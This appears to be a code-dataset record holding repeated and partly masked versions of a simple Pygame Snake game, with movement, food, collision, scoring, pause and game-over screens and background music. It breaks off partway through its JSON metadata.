def touch_border_action(self):
if self.snake.snake_x[0] == W:
self.snake.snake_x[0] = 0
elif self.snake.snake_x[0] < 0:
self.snake.snake_x[0] = W
if self.snake.snake_y[0] == H:
self.snake.snake_y[0] = 0
elif self.snake.snake_y[0] < 0:
self.snake.snake_y[0] = H
def reset_game(self):
self.snake = Snake(self.surface, 3)
self.food = Food(self.surface)
def display_score(self):
font = pygame.font.SysFont('Algerian', 30)
score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,
255, 255))
self.surface.blit(score, (W // 2 - 70, 5))
def screen_msgs(self):
font = pygame.font.SysFont('aharoni', 16)
msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))
msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))
self.surface.blit(msgs1, (W - 100, H - 20))
self.surface.blit(msgs2, (10, H - 20))
def run(self):
clock = pygame.time.Clock()
running = True
pause_game = False
while running:
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
running = False
if event.key == K_SPACE:
pygame.mixer.music.pause()
self.pause_msg()
pause_game = True
if event.key == K_UP:
self.snake.move_up()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_DOWN:
self.snake.move_down()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_LEFT:
self.snake.move_left()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_RIGHT:
self.snake.move_right()
pause_game = False
pygame.mixer.music.unpause()
elif event.type == QUIT:
running = False
if not pause_game:
try:
self.play()
except Exception as e:
self.show_game_over()
pause_game = True
self.reset_game()
clock.tick(60)
if __name__ == '__main__':
game = Game()
game.run()
<|reserved_special_token_1|>
from typing import Sized
import pygame
import time
from pygame.locals import *
import random
SIZE = 20
BACKGROUND = 45, 34, 44
W = 800
H = 400
SCREEN = W, H
class Snake:
def __init__(self, parent_screen, length):
self.parent_screen = parent_screen
self.length = length
self.snake = pygame.image.load('resources/snake.png').convert()
self.snake_x = [W // 2] * length
self.snake_y = [H // 2] * length
self.direction = 'left'
def increase_length(self):
self.length += 1
self.snake_x.append(0)
self.snake_y.append(0)
def draw(self):
for i in range(self.length):
self.parent_screen.blit(self.snake, (self.snake_x[i], self.
snake_y[i]))
pygame.display.flip()
def move(self):
for i in range(self.length - 1, 0, -1):
self.snake_x[i] = self.snake_x[i - 1]
self.snake_y[i] = self.snake_y[i - 1]
if self.direction == 'up':
self.snake_y[0] -= SIZE
if self.direction == 'down':
self.snake_y[0] += SIZE
if self.direction == 'right':
self.snake_x[0] += SIZE
if self.direction == 'left':
self.snake_x[0] -= SIZE
self.draw()
def move_up(self):
self.direction = 'up'
def move_down(self):
self.direction = 'down'
def move_right(self):
self.direction = 'right'
def move_left(self):
self.direction = 'left'
class Food:
def __init__(self, parent_screen):
self.parent_screen = parent_screen
self.food1 = pygame.image.load('resources/food.png').convert()
self.food2 = pygame.image.load('resources/snake1.png').convert()
self.food_x = SIZE * 3
self.food_y = SIZE * 2
def draw(self):
seq = [self.food1, self.food2]
self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))
pygame.display.flip()
def move(self):
self.food_x = random.randint(0, W // SIZE - 1) * SIZE
self.food_y = random.randint(0, H // SIZE - 1) * SIZE
class Game:
def __init__(self):
pygame.init()
pygame.display.set_caption('Snake Game')
self.surface = pygame.display.set_mode(SCREEN)
self.surface.fill(BACKGROUND)
self.snake = Snake(self.surface, 3)
self.snake.draw()
self.food = Food(self.surface)
self.food.draw()
pygame.mixer.init()
self.background_music()
def is_collision(self, x1, y1, x2, y2):
if x1 >= x2 and x1 < x2 + SIZE:
if y1 >= y2 and y1 < y2 + SIZE:
return True
else:
return False
def play_sound(self, sound_location):
sound = pygame.mixer.Sound(sound_location)
pygame.mixer.Sound.play(sound)
def background_music(self):
pygame.mixer.music.load('resources/b_music1.mp3')
pygame.mixer.music.play(-1)
def render_background(self):
bg = pygame.image.load('resources/background.jpg')
self.surface.blit(bg, (0, 0))
def play(self):
self.render_background()
self.snake.move()
self.food.draw()
self.display_score()
self.screen_msgs()
pygame.display.flip()
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],
self.food.food_x, self.food.food_y):
self.food.move()
self.snake.increase_length()
self.play_sound('resources/ding.mp3')
for i in range(2, self.snake.length):
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[
0], self.snake.snake_x[i], self.snake.snake_y[i]):
self.play_sound('resources/fail_buzz.mp3')
raise 'Game Over'
self.touch_border_action()
def pause_msg(self):
font = pygame.font.SysFont('arial', 20)
font1 = pygame.font.SysFont('Rockwell', 80)
line1 = font1.render(f'<Paused>', True, (200, 200, 200))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume',
True, (255, 255, 0))
self.surface.blit(line1, (W // 4 + 20, H // 3))
self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))
pygame.display.flip()
def show_game_over(self):
self.render_background()
font = pygame.font.SysFont('Cooper Black', 30)
font1 = pygame.font.SysFont('Cooper Black', 60)
line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))
line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,
(10, 255, 10))
line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',
True, (200, 200, 200))
line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))
self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))
self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))
self.surface.blit(line2, (45, H // 3 + 110))
self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))
pygame.display.flip()
pygame.mixer.music.rewind()
pygame.mixer.music.pause()
def touch_border_action(self):
if self.snake.snake_x[0] == W:
self.snake.snake_x[0] = 0
elif self.snake.snake_x[0] < 0:
self.snake.snake_x[0] = W
if self.snake.snake_y[0] == H:
self.snake.snake_y[0] = 0
elif self.snake.snake_y[0] < 0:
self.snake.snake_y[0] = H
def reset_game(self):
self.snake = Snake(self.surface, 3)
self.food = Food(self.surface)
def display_score(self):
font = pygame.font.SysFont('Algerian', 30)
score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,
255, 255))
self.surface.blit(score, (W // 2 - 70, 5))
def screen_msgs(self):
font = pygame.font.SysFont('aharoni', 16)
msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))
msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))
self.surface.blit(msgs1, (W - 100, H - 20))
self.surface.blit(msgs2, (10, H - 20))
def run(self):
clock = pygame.time.Clock()
running = True
pause_game = False
while running:
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
running = False
if event.key == K_SPACE:
pygame.mixer.music.pause()
self.pause_msg()
pause_game = True
if event.key == K_UP:
self.snake.move_up()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_DOWN:
self.snake.move_down()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_LEFT:
self.snake.move_left()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_RIGHT:
self.snake.move_right()
pause_game = False
pygame.mixer.music.unpause()
elif event.type == QUIT:
running = False
if not pause_game:
try:
self.play()
except Exception as e:
self.show_game_over()
pause_game = True
self.reset_game()
clock.tick(60)
if __name__ == '__main__':
game = Game()
game.run()
<|reserved_special_token_1|>
from typing import Sized
import pygame
import time
from pygame.locals import *
import random
SIZE = 20
BACKGROUND = (45, 34, 44)
W = 800
H = 400
SCREEN = (W, H)
class Snake:
def __init__(self, parent_screen, length):
self.parent_screen = parent_screen
self.length = length
self.snake = pygame.image.load(
"resources/snake.png").convert() # inserting snake image
self.snake_x = [W//2]*length # list with 'length' number of elements
self.snake_y = [H//2]*length
self.direction = "left" # default direction LEFT
def increase_length(self):
self.length += 1
# adds another block to snake
# appends a random value to the list...cause it will change immidiately in 'move()' method
self.snake_x.append(0)
self.snake_y.append(0)
def draw(self):
# self.parent_screen.fill(BACKGROUND)
for i in range(self.length):
self.parent_screen.blit(
self.snake, (self.snake_x[i], self.snake_y[i])) # drawing snake
pygame.display.flip()
def move(self):
# Logic gor moving the TAIL snakes [like 2nd snake will come to 1st pos, 3rd will move to 2nd pos.]
for i in range(self.length-1, 0, -1): # reverse for loop
self.snake_x[i] = self.snake_x[i-1]
self.snake_y[i] = self.snake_y[i-1]
# Logic for moving the head snakes
if self.direction == 'up':
self.snake_y[0] -= SIZE
if self.direction == 'down':
self.snake_y[0] += SIZE
if self.direction == 'right':
self.snake_x[0] += SIZE
if self.direction == 'left':
self.snake_x[0] -= SIZE
self.draw()
def move_up(self):
self.direction = 'up'
def move_down(self):
self.direction = 'down'
def move_right(self):
self.direction = 'right'
def move_left(self):
self.direction = 'left'
# Apple class
class Food:
def __init__(self, parent_screen):
self.parent_screen = parent_screen
self.food1 = pygame.image.load(
"resources/food.png").convert() # inserting food image
self.food2 = pygame.image.load(
"resources/snake1.png").convert()
self.food_x = SIZE*3
self.food_y = SIZE*2
def draw(self):
seq = [self.food1, self.food2]
self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y)) # drawing snake
pygame.display.flip()
def move(self):
self.food_x = random.randint(0, W//SIZE - 1) * SIZE
self.food_y = random.randint(0, H//SIZE - 1) * SIZE
class Game:
def __init__(self):
pygame.init()
pygame.display.set_caption("Snake Game")
self.surface = pygame.display.set_mode(
SCREEN) # crating game window 1000x720
self.surface.fill(BACKGROUND) # rgb color combination
# snake object (surface, size_of_snake)
self.snake = Snake(self.surface, 3)
self.snake.draw()
self.food = Food(self.surface) # Food object(Surface)
self.food.draw()
pygame.mixer.init() # pygame class mixer...for sound
# start playing background b_music
self.background_music()
def is_collision(self, x1, y1, x2, y2):
if x1 >= x2 and x1 < x2 + SIZE:
if y1 >= y2 and y1 < y2 + SIZE:
return True
else:
return False
def play_sound(self, sound_location):
sound = pygame.mixer.Sound(sound_location) # sound is for short time
pygame.mixer.Sound.play(sound)
def background_music(self):
pygame.mixer.music.load("resources/b_music1.mp3")
pygame.mixer.music.play(-1) #plays music infinitely
def render_background(self):
bg = pygame.image.load("resources/background.jpg")
self.surface.blit(bg, (0, 0))
def play(self):
self.render_background() # render the background
self.snake.move()
self.food.draw()
self.display_score()
self.screen_msgs()
pygame.display.flip()
# Snake colloding with apple
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0], self.food.food_x, self.food.food_y):
self.food.move() # moves apple to random position
self.snake.increase_length()
# play sound when eating the food
self.play_sound("resources/ding.mp3") # passing the music location
# to play the sound
# Snake colliding with itself Game Over logic
for i in range(2, self.snake.length):
if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0], self.snake.snake_x[i], self.snake.snake_y[i]):
# play sound when game Over
self.play_sound("resources/fail_buzz.mp3")
raise "Game Over" # raising exeption
self.touch_border_action()
def pause_msg(self):
font = pygame.font.SysFont('arial', 20)
font1 = pygame.font.SysFont('Rockwell', 80)
line1 = font1.render(
f"<Paused>", True, (200, 200, 200))
line2 = font.render(
f"Press <UP, DOWN, LEFT, RIGHT> To Resume", True, (255,255, 0))
self.surface.blit(line1, (W//4 + 20, H//3))
self.surface.blit(line2, (W//4 + 30, H//3 + 100))
pygame.display.flip()
def show_game_over(self):
# self.surface.fill(BACKGROUND)
self.render_background()
font = pygame.font.SysFont('Cooper Black', 30)
font1 = pygame.font.SysFont('Cooper Black', 60)
line1 = font1.render(
f"GAME OVER !!", True, (200, 0, 0))
line1B = font.render(
f"<<Score : {self.snake.length - 3}>>", True, (10, 255, 10))
line2 = font.render(
f"Press <UP, DOWN, LEFT, RIGHT> To Play Again", True, (200, 200, 200))
line3 = font.render(
f"Press ESC to EXIT!", True, (255, 200, 0))
self.surface.blit(line1, (W//4 - 25, H//3-45))
self.surface.blit(line1B, (W//4 + 100, H//3 + 60))
self.surface.blit(line2, (45, H//3 + 110))
self.surface.blit(line3, (W//4+50, H//3 + 160))
pygame.display.flip()
# pause the background_music when game over
pygame.mixer.music.rewind()
pygame.mixer.music.pause()
def touch_border_action(self):
if self.snake.snake_x[0] == W:
self.snake.snake_x[0] = 0
elif self.snake.snake_x[0] < 0:
self.snake.snake_x[0] = W
if self.snake.snake_y[0] == H:
self.snake.snake_y[0] = 0
elif self.snake.snake_y[0] < 0:
self.snake.snake_y[0] = H
def reset_game(self):
self.snake = Snake(self.surface, 3)
self.food = Food(self.surface) # Food object(Surface)
def display_score(self):
font = pygame.font.SysFont('Algerian', 30)
score = font.render(
f"[Score : {self.snake.length - 3}]", True, (0, 255, 255))
self.surface.blit(score, (W //2 - 70 , 5))
def screen_msgs(self):
font = pygame.font.SysFont('aharoni',16)
msgs1 = font.render("[SPACE] to Pause", True, (200, 204, 255))
msgs2 = font.render("[ESC] to EXIT", True, (200, 204, 255))
self.surface.blit(msgs1, (W - 100, H - 20))
self.surface.blit(msgs2, (10, H - 20))
def run(self):
clock = pygame.time.Clock()
running = True
pause_game = False
while running:
for event in pygame.event.get():
if event.type == KEYDOWN:
if event.key == K_ESCAPE: # PRESS esc to escape the screen
running = False
if event.key == K_SPACE: # to pause the game
pygame.mixer.music.pause()
self.pause_msg()
pause_game = True
if event.key == K_UP:
self.snake.move_up()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_DOWN:
self.snake.move_down()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_LEFT:
self.snake.move_left()
pause_game = False
pygame.mixer.music.unpause()
if event.key == K_RIGHT:
self.snake.move_right()
pause_game = False
pygame.mixer.music.unpause()
elif event.type == QUIT:
running = False
if not pause_game:
try:
self.play()
except Exception as e:
self.show_game_over()
pause_game = True
self.reset_game()
clock.tick(60)
if __name__ == "__main__":
game = Game() # Game class object
game.run()
# auto-py-to-exe.exe # run this commande to convert to exe
|
flexible
|
{
"blob_id": "935853a4afdb50a4652e14913d0cdb251a84ea14",
"index": 6427,
"step-1": "<mask token>\n\n\nclass Food:\n <mask token>\n\n def draw(self):\n seq = [self.food1, self.food2]\n self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))\n pygame.display.flip()\n\n def move(self):\n self.food_x = random.randint(0, W // SIZE - 1) * SIZE\n self.food_y = random.randint(0, H // SIZE - 1) * SIZE\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n pygame.display.set_caption('Snake Game')\n self.surface = pygame.display.set_mode(SCREEN)\n self.surface.fill(BACKGROUND)\n self.snake = Snake(self.surface, 3)\n self.snake.draw()\n self.food = Food(self.surface)\n self.food.draw()\n pygame.mixer.init()\n self.background_music()\n\n def is_collision(self, x1, y1, x2, y2):\n if x1 >= x2 and x1 < x2 + SIZE:\n if y1 >= y2 and y1 < y2 + SIZE:\n return True\n else:\n return False\n\n def play_sound(self, sound_location):\n sound = pygame.mixer.Sound(sound_location)\n pygame.mixer.Sound.play(sound)\n\n def background_music(self):\n pygame.mixer.music.load('resources/b_music1.mp3')\n pygame.mixer.music.play(-1)\n\n def render_background(self):\n bg = pygame.image.load('resources/background.jpg')\n self.surface.blit(bg, (0, 0))\n\n def play(self):\n self.render_background()\n self.snake.move()\n self.food.draw()\n self.display_score()\n self.screen_msgs()\n pygame.display.flip()\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],\n self.food.food_x, self.food.food_y):\n self.food.move()\n self.snake.increase_length()\n self.play_sound('resources/ding.mp3')\n for i in range(2, self.snake.length):\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[\n 0], self.snake.snake_x[i], self.snake.snake_y[i]):\n self.play_sound('resources/fail_buzz.mp3')\n raise 'Game Over'\n self.touch_border_action()\n\n def pause_msg(self):\n font = pygame.font.SysFont('arial', 20)\n font1 = pygame.font.SysFont('Rockwell', 80)\n line1 = font1.render(f'<Paused>', True, (200, 200, 200))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume', \n True, (255, 255, 0))\n self.surface.blit(line1, (W // 4 + 20, H // 3))\n self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))\n pygame.display.flip()\n\n def show_game_over(self):\n self.render_background()\n font = pygame.font.SysFont('Cooper Black', 30)\n font1 = pygame.font.SysFont('Cooper Black', 60)\n line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))\n line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,\n (10, 255, 10))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',\n True, (200, 200, 200))\n line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))\n self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))\n self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))\n self.surface.blit(line2, (45, H // 3 + 110))\n self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))\n pygame.display.flip()\n pygame.mixer.music.rewind()\n pygame.mixer.music.pause()\n\n def touch_border_action(self):\n if self.snake.snake_x[0] == W:\n self.snake.snake_x[0] = 0\n elif self.snake.snake_x[0] < 0:\n self.snake.snake_x[0] = W\n if self.snake.snake_y[0] == H:\n self.snake.snake_y[0] = 0\n elif self.snake.snake_y[0] < 0:\n self.snake.snake_y[0] = H\n\n def reset_game(self):\n self.snake = Snake(self.surface, 3)\n self.food = Food(self.surface)\n\n def display_score(self):\n font = pygame.font.SysFont('Algerian', 30)\n score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,\n 255, 255))\n self.surface.blit(score, (W // 2 - 70, 5))\n\n def screen_msgs(self):\n font = pygame.font.SysFont('aharoni', 16)\n msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))\n msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))\n self.surface.blit(msgs1, (W - 100, H - 20))\n self.surface.blit(msgs2, (10, H - 20))\n\n def run(self):\n clock = pygame.time.Clock()\n running = True\n pause_game = False\n while running:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n if event.key == K_SPACE:\n pygame.mixer.music.pause()\n self.pause_msg()\n pause_game = True\n if event.key == K_UP:\n self.snake.move_up()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_DOWN:\n self.snake.move_down()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_LEFT:\n self.snake.move_left()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_RIGHT:\n self.snake.move_right()\n pause_game = False\n pygame.mixer.music.unpause()\n elif event.type == QUIT:\n running = False\n if not pause_game:\n try:\n self.play()\n except Exception as e:\n self.show_game_over()\n pause_game = True\n self.reset_game()\n clock.tick(60)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Snake:\n\n def __init__(self, parent_screen, length):\n self.parent_screen = parent_screen\n self.length = length\n self.snake = pygame.image.load('resources/snake.png').convert()\n self.snake_x = [W // 2] * length\n self.snake_y = [H // 2] * length\n self.direction = 'left'\n <mask token>\n\n def draw(self):\n for i in range(self.length):\n self.parent_screen.blit(self.snake, (self.snake_x[i], self.\n snake_y[i]))\n pygame.display.flip()\n\n def move(self):\n for i in range(self.length - 1, 0, -1):\n self.snake_x[i] = self.snake_x[i - 1]\n self.snake_y[i] = self.snake_y[i - 1]\n if self.direction == 'up':\n self.snake_y[0] -= SIZE\n if self.direction == 'down':\n self.snake_y[0] += SIZE\n if self.direction == 'right':\n self.snake_x[0] += SIZE\n if self.direction == 'left':\n self.snake_x[0] -= SIZE\n self.draw()\n\n def move_up(self):\n self.direction = 'up'\n\n def move_down(self):\n self.direction = 'down'\n\n def move_right(self):\n self.direction = 'right'\n\n def move_left(self):\n self.direction = 'left'\n\n\nclass Food:\n\n def __init__(self, parent_screen):\n self.parent_screen = parent_screen\n self.food1 = pygame.image.load('resources/food.png').convert()\n self.food2 = pygame.image.load('resources/snake1.png').convert()\n self.food_x = SIZE * 3\n self.food_y = SIZE * 2\n\n def draw(self):\n seq = [self.food1, self.food2]\n self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))\n pygame.display.flip()\n\n def move(self):\n self.food_x = random.randint(0, W // SIZE - 1) * SIZE\n self.food_y = random.randint(0, H // SIZE - 1) * SIZE\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n pygame.display.set_caption('Snake Game')\n self.surface = pygame.display.set_mode(SCREEN)\n self.surface.fill(BACKGROUND)\n self.snake = Snake(self.surface, 3)\n self.snake.draw()\n self.food = Food(self.surface)\n self.food.draw()\n pygame.mixer.init()\n self.background_music()\n\n def is_collision(self, x1, y1, x2, y2):\n if x1 >= x2 and x1 < x2 + SIZE:\n if y1 >= y2 and y1 < y2 + SIZE:\n return True\n else:\n return False\n\n def play_sound(self, sound_location):\n sound = pygame.mixer.Sound(sound_location)\n pygame.mixer.Sound.play(sound)\n\n def background_music(self):\n pygame.mixer.music.load('resources/b_music1.mp3')\n pygame.mixer.music.play(-1)\n\n def render_background(self):\n bg = pygame.image.load('resources/background.jpg')\n self.surface.blit(bg, (0, 0))\n\n def play(self):\n self.render_background()\n self.snake.move()\n self.food.draw()\n self.display_score()\n self.screen_msgs()\n pygame.display.flip()\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],\n self.food.food_x, self.food.food_y):\n self.food.move()\n self.snake.increase_length()\n self.play_sound('resources/ding.mp3')\n for i in range(2, self.snake.length):\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[\n 0], self.snake.snake_x[i], self.snake.snake_y[i]):\n self.play_sound('resources/fail_buzz.mp3')\n raise 'Game Over'\n self.touch_border_action()\n\n def pause_msg(self):\n font = pygame.font.SysFont('arial', 20)\n font1 = pygame.font.SysFont('Rockwell', 80)\n line1 = font1.render(f'<Paused>', True, (200, 200, 200))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume', \n True, (255, 255, 0))\n self.surface.blit(line1, (W // 4 + 20, H // 3))\n self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))\n pygame.display.flip()\n\n def show_game_over(self):\n self.render_background()\n font = pygame.font.SysFont('Cooper Black', 30)\n font1 = pygame.font.SysFont('Cooper Black', 60)\n line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))\n line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,\n (10, 255, 10))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',\n True, (200, 200, 200))\n line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))\n self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))\n self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))\n self.surface.blit(line2, (45, H // 3 + 110))\n self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))\n pygame.display.flip()\n pygame.mixer.music.rewind()\n pygame.mixer.music.pause()\n\n def touch_border_action(self):\n if self.snake.snake_x[0] == W:\n self.snake.snake_x[0] = 0\n elif self.snake.snake_x[0] < 0:\n self.snake.snake_x[0] = W\n if self.snake.snake_y[0] == H:\n self.snake.snake_y[0] = 0\n elif self.snake.snake_y[0] < 0:\n self.snake.snake_y[0] = H\n\n def reset_game(self):\n self.snake = Snake(self.surface, 3)\n self.food = Food(self.surface)\n\n def display_score(self):\n font = pygame.font.SysFont('Algerian', 30)\n score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,\n 255, 255))\n self.surface.blit(score, (W // 2 - 70, 5))\n\n def screen_msgs(self):\n font = pygame.font.SysFont('aharoni', 16)\n msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))\n msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))\n self.surface.blit(msgs1, (W - 100, H - 20))\n self.surface.blit(msgs2, (10, H - 20))\n\n def run(self):\n clock = pygame.time.Clock()\n running = True\n pause_game = False\n while running:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n if event.key == K_SPACE:\n pygame.mixer.music.pause()\n self.pause_msg()\n pause_game = True\n if event.key == K_UP:\n self.snake.move_up()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_DOWN:\n self.snake.move_down()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_LEFT:\n self.snake.move_left()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_RIGHT:\n self.snake.move_right()\n pause_game = False\n pygame.mixer.music.unpause()\n elif event.type == QUIT:\n running = False\n if not pause_game:\n try:\n self.play()\n except Exception as e:\n self.show_game_over()\n pause_game = True\n self.reset_game()\n clock.tick(60)\n\n\n<mask token>\n",
"step-3": "<mask token>\nSIZE = 20\nBACKGROUND = 45, 34, 44\nW = 800\nH = 400\nSCREEN = W, H\n\n\nclass Snake:\n\n def __init__(self, parent_screen, length):\n self.parent_screen = parent_screen\n self.length = length\n self.snake = pygame.image.load('resources/snake.png').convert()\n self.snake_x = [W // 2] * length\n self.snake_y = [H // 2] * length\n self.direction = 'left'\n\n def increase_length(self):\n self.length += 1\n self.snake_x.append(0)\n self.snake_y.append(0)\n\n def draw(self):\n for i in range(self.length):\n self.parent_screen.blit(self.snake, (self.snake_x[i], self.\n snake_y[i]))\n pygame.display.flip()\n\n def move(self):\n for i in range(self.length - 1, 0, -1):\n self.snake_x[i] = self.snake_x[i - 1]\n self.snake_y[i] = self.snake_y[i - 1]\n if self.direction == 'up':\n self.snake_y[0] -= SIZE\n if self.direction == 'down':\n self.snake_y[0] += SIZE\n if self.direction == 'right':\n self.snake_x[0] += SIZE\n if self.direction == 'left':\n self.snake_x[0] -= SIZE\n self.draw()\n\n def move_up(self):\n self.direction = 'up'\n\n def move_down(self):\n self.direction = 'down'\n\n def move_right(self):\n self.direction = 'right'\n\n def move_left(self):\n self.direction = 'left'\n\n\nclass Food:\n\n def __init__(self, parent_screen):\n self.parent_screen = parent_screen\n self.food1 = pygame.image.load('resources/food.png').convert()\n self.food2 = pygame.image.load('resources/snake1.png').convert()\n self.food_x = SIZE * 3\n self.food_y = SIZE * 2\n\n def draw(self):\n seq = [self.food1, self.food2]\n self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))\n pygame.display.flip()\n\n def move(self):\n self.food_x = random.randint(0, W // SIZE - 1) * SIZE\n self.food_y = random.randint(0, H // SIZE - 1) * SIZE\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n pygame.display.set_caption('Snake Game')\n self.surface = pygame.display.set_mode(SCREEN)\n self.surface.fill(BACKGROUND)\n self.snake = Snake(self.surface, 3)\n self.snake.draw()\n self.food = Food(self.surface)\n self.food.draw()\n pygame.mixer.init()\n self.background_music()\n\n def is_collision(self, x1, y1, x2, y2):\n if x1 >= x2 and x1 < x2 + SIZE:\n if y1 >= y2 and y1 < y2 + SIZE:\n return True\n else:\n return False\n\n def play_sound(self, sound_location):\n sound = pygame.mixer.Sound(sound_location)\n pygame.mixer.Sound.play(sound)\n\n def background_music(self):\n pygame.mixer.music.load('resources/b_music1.mp3')\n pygame.mixer.music.play(-1)\n\n def render_background(self):\n bg = pygame.image.load('resources/background.jpg')\n self.surface.blit(bg, (0, 0))\n\n def play(self):\n self.render_background()\n self.snake.move()\n self.food.draw()\n self.display_score()\n self.screen_msgs()\n pygame.display.flip()\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],\n self.food.food_x, self.food.food_y):\n self.food.move()\n self.snake.increase_length()\n self.play_sound('resources/ding.mp3')\n for i in range(2, self.snake.length):\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[\n 0], self.snake.snake_x[i], self.snake.snake_y[i]):\n self.play_sound('resources/fail_buzz.mp3')\n raise 'Game Over'\n self.touch_border_action()\n\n def pause_msg(self):\n font = pygame.font.SysFont('arial', 20)\n font1 = pygame.font.SysFont('Rockwell', 80)\n line1 = font1.render(f'<Paused>', True, (200, 200, 200))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume', \n True, (255, 255, 0))\n self.surface.blit(line1, (W // 4 + 20, H // 3))\n self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))\n pygame.display.flip()\n\n def show_game_over(self):\n self.render_background()\n font = pygame.font.SysFont('Cooper Black', 30)\n font1 = pygame.font.SysFont('Cooper Black', 60)\n line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))\n line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,\n (10, 255, 10))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',\n True, (200, 200, 200))\n line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))\n self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))\n self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))\n self.surface.blit(line2, (45, H // 3 + 110))\n self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))\n pygame.display.flip()\n pygame.mixer.music.rewind()\n pygame.mixer.music.pause()\n\n def touch_border_action(self):\n if self.snake.snake_x[0] == W:\n self.snake.snake_x[0] = 0\n elif self.snake.snake_x[0] < 0:\n self.snake.snake_x[0] = W\n if self.snake.snake_y[0] == H:\n self.snake.snake_y[0] = 0\n elif self.snake.snake_y[0] < 0:\n self.snake.snake_y[0] = H\n\n def reset_game(self):\n self.snake = Snake(self.surface, 3)\n self.food = Food(self.surface)\n\n def display_score(self):\n font = pygame.font.SysFont('Algerian', 30)\n score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,\n 255, 255))\n self.surface.blit(score, (W // 2 - 70, 5))\n\n def screen_msgs(self):\n font = pygame.font.SysFont('aharoni', 16)\n msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))\n msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))\n self.surface.blit(msgs1, (W - 100, H - 20))\n self.surface.blit(msgs2, (10, H - 20))\n\n def run(self):\n clock = pygame.time.Clock()\n running = True\n pause_game = False\n while running:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n if event.key == K_SPACE:\n 